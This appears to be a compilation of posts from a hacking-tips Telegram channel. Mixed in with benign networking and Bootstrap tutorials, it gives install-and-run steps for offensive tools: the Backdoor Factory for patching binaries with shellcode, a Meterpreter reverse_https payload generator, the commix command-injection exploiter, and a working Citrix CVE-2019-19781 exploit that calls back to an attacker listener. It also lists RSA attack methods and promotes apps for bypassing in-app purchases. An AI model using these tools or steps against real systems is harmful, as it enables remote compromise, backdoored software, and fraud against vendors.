▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2019 updated T-LOAD is a bash based script which modifies and changes your terminal from boring to awesome in just oneclick without any issue and without root. This tool works on both rooted Android device and Non-rooted Android device.(TERMUX)
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) apt-get update -y

2) apt-get upgrade -y

3) pkg install git -y

4) git clone https://github.com/noob-hackers/T-LOAD

5) ls

6) cd T-LOAD

7) ls

8) bash t-load.sh

9) Now make sue that you internet connection is on and after that the installation starts automatically

10) After the installation succesfully completes you will see a THANKS text on screen after that a new text appears

11) EXIT FROM TERMUX AFTER 5 SECONDS AND RE-OPEN IT after seeing this just exit from termux and re open it

12) Now you can see a new loading screen of termux and you can feel real hacking terminal Sound+New interface with banner.

13) Note:- Don't delete any of the audio files from your sdcard/internal storage or else you cannot feel the terminal startup sound

14) To revert/to get back into normal termux mode use this commands

15) cd T-LOAD

16) ls

17) bash rvt.sh

@UndercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Expert Hacking The Rsa Attack Tutorial By UNDERCODE
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) Initial conditions. The adversary knows the public key (e, n) and ciphertext C.

Task. Find the source text M.

The opponent selects the number j, which satisfies the following relationship: C e j (mod n) = C . Those. the adversary simply performs encryption j times on the open key of the intercepted ciphertext (this is as follows: (С e ) e ) e ..) e (mod n) = С e j (mod n) ). Having found such j, the adversary calculates C e j-1 (mod n) (i.e., repeats the encryption operation j-1 times) - this value is the plaintext M! This follows from the fact that C e j (mod n) = (C e j-1(mod n)) e = C . That is, a certain number C e j-1 (mod n) of degree e gives the ciphertext C. But what is this if not the plaintext M?

Example (according to Sinmons & Norris). p = 983, q = 563, e = 49, M = 123456.

C = M 49 (mod n) = 1603, C 49 7 (mod n) = 85978, C 49 8 (mod n) = 123456 , C 49 9 (mod n) = 1603.



2) Attack on the RSA signature in a notary scheme.

Initial conditions. There is an electronic notary signing the documents passing through it. N - some plain text that the notary does not want to sign. The opponent knows the public key (e, n) of the notary public.

Task. Sign this text N.

The adversary produces a certain random number x, which is coprime with N and calculates y = x e (mod n). Then it receives the value M = yN and transmits it for signature to a notary. The signs (in fact this is not the text of N!) M d (mod n) = the S . That is, we get that S = M d (mod n) = y d N d = (x e ) d N d = xN d , and therefore N d = Sx -1 (mod n). That is, you just need to divide obtained S on x.

Protection. When signing, add some random number to the message (for example, time). Thus, a distortion of the number M during the signature will be obtained, that is, M (after adding) ... yN.



3) Attack on the RSA signature on the selected ciphertext.

Initial conditions. There is ciphertext C. The adversary knows the public key (e, n) of the sender of the message.

Task. Find the source text M

The adversary produces a certain r: r <n, (r, n) = 1 and calculates x = r e (mod n). Then, o computes t = r -1 (mod n) and y = xC (mod n) and sends y to the sender for signature.

The sender, unsuspecting, signs the text y: w = y d (mod n) and sends w back.

The adversary calculates tw (mod n) = r -1 y d (mod n) = (since r = x d mod n) = x -d x d C d (mod n) = C d = M.

The adversary cannot immediately send C for signature, because the sender looks at the messages received as a result of the signature and may notice a provocation.

The attack is somewhat hypothetical in nature, but nevertheless allows you to make several important conclusions: a) you need to sign and encrypt with different keys, or b) add a random vector when signing or use a hash function.

Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WHAT IS CYPHER ATTACK & HOW IT WORKS ?
t.me/UndercOdeTesting

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) A ciphertext-only attack attack - users A and B encrypt their data, and a cryptanalyst tries to decrypt a message only if there is encrypted text.
Attack with a known-plaintext attack (known plaintext attack) - are known and open and encrypted text. The goal of the attack is to find the key.

2) Selected plaintext attack - a cryptanalyst can independently select plaintext. It is possible to send any number of simple texts and receive corresponding encrypted texts in response. There are autonomous (offline) and operational (online) types of attacks. In the first case, the choice of plaintexts is prepared in advance, before receiving encrypted texts. In the second case, each subsequent plaintext is selected based on the already received encrypted texts .

3) Selected ciphertext attack - a cryptanalyst has the ability to select both open and encrypted text. For each matched plaintext, the cryptanalyst receives encrypted text, for each matched encrypted text, the corresponding plaintext.

4) Attacks based on the birthday attack paradox are attacks that get their name in honor of the birthday task paradox . The essence of the paradox is as follows: if there are 23 people in the room, then the probability that two of them were born on the same day exceeds 50%. This type of attack is based on the fact that the same values appear faster than you might expect.

5) Bilateral attack or “ meet-in-the-middle attack” - a cryptanalyst builds a table of keys that he independently selected. The difference between an attack based on the birthday paradox and a two-way attack is that in the first case, the cryptanalyst waits for the same value to appear twice in many elements, in a two-way attack, he waits for the two sets to intersect.

@Mr Botnet

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑DDOS OR DOS WHAT IS DIFFERENCE ??
Twitter.com/UNDERCODETC

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) DoS Attack

> A Denial-of-Service attack (DoS attack) is a type of cyber attack executed from a single server or a home network. It can compromise your website in the following ways:


1) Resource exhaustion, such as using all CPU time, bandwidth, etc.

2) Limitation exploitation, such as repeatedly attempting to log into one account to constantly block the legitimate user out

3) Process crashing, such as leveraging an infected software to disrupt
requests sent from legitimate users

4) Data corruption, such as changing all user types into invalid types to prevent users from logging in


🦑DDOS :

1) send a large amount of requests to your website at the same time.

2) If a DoS attack is like starting a one-on-one fight, then DDoS attack is like besieging your house with people flooding from different directions. What’s worse, these people all look like legitimate visitors, because DDoS attackers can compromise legitimate source IPs and leverage them to start an attack. Even if there is no malicious hacker, DDoS can still happen when there is an unexpectedly large traffic to your website.

3) DDoS attacks are very hard to prevent, because it’s difficult to differentiate a legitimate user from a compromised visitor. To help you mitigate the increasingly rampant DDoS attack, SiteLock Website Security, the most comprehensive DDoS protection solution in the industry, can target vital components of comprehensive DDoS attacks by providing Web Application Protection, Infrastructure Protection and DNS Protection, adding multiple layers to your online business.

@Mr Botnet

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄𝖀𝕹𝕯𝕰𝕽𝕮𝕺𝕯𝕰 𝕹𝕰𝖂𝕾 ▄ ▂ ▁


1) WE GOT NOW A FACEBOOK GROUPE ForPosts Only Related To UndercOde & some difference in posts with wa/teleg

> fb.com/groups/UndercOdeTesting


2) Our link To Official Telegram Is Changed WIth The discuss One
> Official Telegram :
t.me/UndercOdeTesting
> Discuss :
t.me/UndercOdeTestingOfficial
(Our Telegram For iOs Still same t.me/iOsdeveloppers
Admin still same t.me/UndercOdeOfficial )


▁ ▂ ▄𝖀𝕹𝕯𝕰𝕽𝕮𝕺𝕯𝕰 𝕹𝕰𝖂𝕾 ▄ ▂ ▁

🦑 Under Code Facebook Groupe :

Fb.com/groups/UndercOdeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2019 updated termux tool installer most helpfull termux tool :
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/Gameye98/Lazymux

2) cd Lazymux

3) python2 lazymux.py

🦑FEATURES :

> Information Gathering

> Vulnerability Scanner

> Stress Testing

> Password Attacks

> Web Hacking

>Exploitation Tools

> sniffing & Spoofing

> other...


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑An advanced multithreaded admin panel finder
Twitter.com/UndercOdeTC

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/s0md3v/Breacher

2) cd Breacher

3) Check all paths with php extension

> python breacher -u example.com --type php

4) Check all paths with php extension with threads

> python breacher -u example.com --type php --fast

5) Check all paths without threads

> python breacher -u example.com

6) Adding a custom path. For example if you want all paths to start with /data (example.com/data/...) you can do this:

> python breacher -u example.com --path /data

🦑FEATURES:

1) Multi-threading on demand

2) Big path list (482 paths)

3) Supports php, asp and html extensions

4) Checks for potential EAR vulnerabilites

5) Checks for robots.txt

6) Support for custom patns


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Create an Admin Panel with a Bootstrap Template?
T.me/UndercOdeTesting

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) Getting an Admin Template You Love

>StarAdmin free bootstrap admin template as an example. The template has a nice and clean design and the quality of the code is great. I find it just right to create a simple admin panel. And it is free. Also, the template is updated to the latest version of Bootstrap, Bootstrap 4 beta.

2) The Design of the Admin Panel

THEN The top navbar of the dashboard has the navbar brand "Star" on the left end

> Next, in the navbar, there is a hamburger icon on the left 😅.On the right end, there is a button with refresh icon, a bell icon with the number of notifications indicated and an envelope icon with an indication of the number of messages. At the end, there is a profile picture of the user.

> In the left sidebar, there is only one menu item, the dashboard, for now.
In the content area, In the first card, we have a bar graph and a donut chart. The bar graph displays the types of traffic that flow into the website and the donut chart displays the device sources of the traffic.

3) Let's Get Coding

> Installation
Before starting coding make sure to install Git, Node.js, and npm. Gulp is used as the build tool. Installing Gulp requires that you have Node installed on your computer.
This creates the foundation for the development of the dashboard.

>Download the Template
Open the command prompt and change the directory path to the project folder and download the template. enter the command git clone https://github.com/BootstrapDash/StarAdmin-Free-Bootstrap-Admin-Template.git.  This will download the template to your folder. Or you can download the template files as a zip folder.

4) go to the command prompt, and enter the command gulp serve at the command prompt. This will open up the index.html file of the template in the default browser.

5)edit the existing index.html page and edit the page. To do this, open the page in a code editor.

6)There is a refresh icon, a bell icon, and an envelope icon. When you hit 'save' is gulp task is running, the browser will refresh and the changes will be automatically displayed on the browser


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Usefull code for html edit with code editor for Admin Panel :
Fb.com/UndercOdeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

<!--Navbar-->
<nav class="navbar bg-primary-gradient col-lg-12 col-12 p-0 fixed-top navbar-inverse d-flex flex-row">
<!-- Navbar brand -->
<div class="bg-white text-center navbar-brand-wrapper">
<a class="navbar-brand brand-logo" href="#"><img src="../images/logo_star_black.png" /></a>
<a class="navbar-brand brand-logo-mini" href="#"><img src="../images/logo_star_mini.jpg" alt=""></a>
</div>
<!-- Navbar brand ends -->
<div class="navbar-menu-wrapper d-flex align-items-center">
<button class="navbar-toggler navbar-toggler hidden-md-down align-self-center mr-3" type="button" data-toggle="minimize">
<span class="navbar-toggler-icon"></span>
</button>
<-- navbar icons -->
<ul class="navbar-nav ml-lg-auto d-flex align-items-center flex-row">
<li class="nav-item">
<a class="nav-link" href="#"><i class="fa fa-refresh"></i></a>
</li>
<li class="nav-item">
<a class="nav-link" href="#"><i class="fa fa-bell-o "></i></a>
</li>
<li class="nav-item">
<a class="nav-link" href="#"><i class="fa fa-envelope-o"></i></a>
</li>
<li class="nav-item">
<a class="nav-link profile-pic" href="#"><img class="rounded-circle" src="../images/face.jpg" alt=""></a>
</li>
</ul>
<-- navbar icons end -->
<button class="navbar-toggler navbar-toggler-right hidden-lg-up align-self-center" type="button" data-toggle="offcanvas">
<span class="navbar-toggler-icon"></span>
</button>
</div>
</nav>
<!--End navbar-->

Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑Best android apps 2019-2020 to bypass purchase :
T.me/UndercOdeTesting

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

1) LUCKY PATCHER
Lucky Patcher is the most commonly used application for bypassing the in-app purchase restrictions in Android apps.

> https://www.luckypatchers.com/download/

2) FREEDOM APK
Freedom APK is an Android app which will help you unlock the premium features of popular games free of cost.

> https://freedomapkdld.com/

3) LEO PLAYCARD
Another app you can use to hack in-app purchase on Android is Leo Playcard. The app hacks Android games in a manner similar to Lucky Patcher above.


> http://leoplaycard.info/

4) XMODGAMES
Xmodgames is another app that allows you to access in-app purchases in games for free. This app unlocks purchases in games like ‘Clash of Clans’, ‘8 ball pool’, ‘Clash Royale 💀

> https://xmodgames.download/

5) CREE HACK
Cree Hack is another good application to get the free in-app purchase on Android for any game and update to the maximum level.

> https://creehacks.com/

Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑WANNA TO HACK CARS LIKE FATE&FURIOUS, Remontly, unlocking ...
T.me/UndercOdeTesting

1) OpenGarages - Provides public access, documentation and tools necessary to understand today's modern vehicle systems.
> http://opengarages.org/index.php/Main_Page

2) DEFCON Car Hacking Village - Car Hacking exercises from DEFCON 24.
> http://www.carhackingvillage.com/

3) canbushack: Hack Your Car - course on Vehicle Hacking methodology.
> http://www.canbushack.com/blog/index.php

4) OWASP Internet of Things Project - OWASP's project to secure IoT, from cars to medical devices and beyond.
> https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=Community

5) I Am The Cavalry - Global grassroots (eg. volunteer) initiative focused on the intersection of security and human life/public safety issues, such as cars. Participation from security researchers, OEMs, Tier 1s, and many others. Published Automotive 5-Star Cyber Safety Framework.
> https://www.iamthecavalry.org/

6) Carloop Community - Community of people interested in car hacking and connecting vehicles to the cloud.
> https://community.carloop.io/


7) Python Security - A website for brows in and buying python-integrated cars having certain vehicular security features.
> http://www.pythoncarsecurity.com/


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

2020 updated web server scanner
Fb.com/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/sullo/nikto.git

2) cd nikto

3) docker build -t sullo/nikto .
# Call it without arguments to display the full help

4) docker run --rm sullo/nikto
# Basic usage

5)docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:

6) docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json

🦑Tested by UndercOde On:

> kali

> ubanto


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Social engeneer tool : the backdoor factory For security professionals and researchers only.
The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) sudo pip install capstone

2) git clone https://github.com/secretsquirrel/the-backdoor-factory

3) cd the-backdoor-factory

4) docker pull secretsquirrel/the-backdoor-factory

5) docker run -it secretsquirrel/the-backdoor-factory bash

6) ./backdoor.py

🦑For Macos run as bash :

chmod 777 install.sh

./install.sh


Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is the difference between IPv4 and IPv6?
One of the main differences between IPv4 and IPv6 is their address space:
twitter.com/UNdercodetc

1) IPv4 addresses are 32 bits in size.

> Whereas the IPv6 address fields are 128 bits.

2) Due to their difference in address space, the appearance of IP addresses in IPv4 and IPv6 also looks different.

> In IPv4, IP addresses are displayed as four decimal numbers in 1 byte, separated by periods (for example: 192.168.1.1), and in IPv6 IP addresses, hexadecimal numbers are displayed, separated by colons (for example: fe80 :: d4a8: 6435: d2d8: d9f3b11) .

3) Clients using IPv4 addresses use a DHCP server to determine the address each time they enter the network.

>This process of assigning addresses is called automatic network state tuning.

4) IPv6 supports the revised DHCPv6 protocol, which supports automatic state configuration and supports automatic stateless configuration of hosts.

5) Automatic configuration without saving does not require the DHCP server to receive addresses.

6) Automatic configuration without saving uses a router request to create a unique address.
> This creates a plug-and-play environment that simplifies address management and administration.

7) IPv6 also allows automatic configuration and reconfiguration of addresses.

8) This feature allows administrators to renumber network addresses without access to all clients.

This is the main difference between IPv4 and IPv6.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top Exploite tool Meterpreter Paranoid Mode - SSL/TLS connections for linux :
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) Download framework from github

> git clone https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git

2) Set files execution permitions

> cd Meterpreter_Paranoid_Mode-SSL

3) sudo chmod +x *.sh

4) Config tool settings

> nano settings

5) Run main tool

>sudo ./Meterpreter_Paranoid_Mode.sh

🦑Payloads available:

Staged (payload.bat|ps1|txt|exe):
windows/meterpreter/reverse_winhttps
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https

Stageless (binary.exe):
windows/meterpreter_reverse_https
windows/x64/meterpreter_reverse_https

Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller and Citrix Gateway detailed
fb.com/UndercOdeTestingCompany

🦑🅻🅴🆃 🆂 🆂🆃🅰️🆁🆃:

> A vulnerability has been identified in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.

> The vulnerability has been assigned the following CVE number:

> CVE-2019-19781 : Vulnerability in Citrix Application Delivery Controller and Citrix Gateway leading to arbitrary code execution

> The vulnerability affects all supported product versions and all supported platforms:

1) Citrix ADC and Citrix Gateway version 13.0 all supported builds

2) Citrix ADC and NetScaler Gateway version 12.1 all supported builds

3) Citrix ADC and NetScaler Gateway version 12.0 all supported builds

4) Citrix ADC and NetScaler Gateway version 11.1 all supported builds

5) Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds

@M̵͘ ̠̖r̶̕.̵́ ̷͠B̴͘O̷̓T̶̆Ń̴E̶͛T̶̅(tm
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑cve-2019-19781 Bug
>This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

This tool used for exploite servers

1) git clone https://github.com/trustedsec/cve-2019-19781

2) cd cve-2019-19781

3) pip3 install -r requirements.txt

4) python citrixmash.py <attackerip_listener> <attacker_port>

🦑How it works ?

> This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution.

> Be sure to cleanup these two file locations: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/

>Note that DNS hostnames and IP addresses are supported in victimaddress and attackerip_listener fields.

Written by UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Automated All-in-One OS command injection and exploitation tool
2020 updated :
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/commixproject/commix.git commix

2) cd commix

3) python commix.py -h

🦑What is The Use ?

>Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool ,

>that can be used from web developers, penetration testers or even security researchers in order to test web-based applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.

> By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁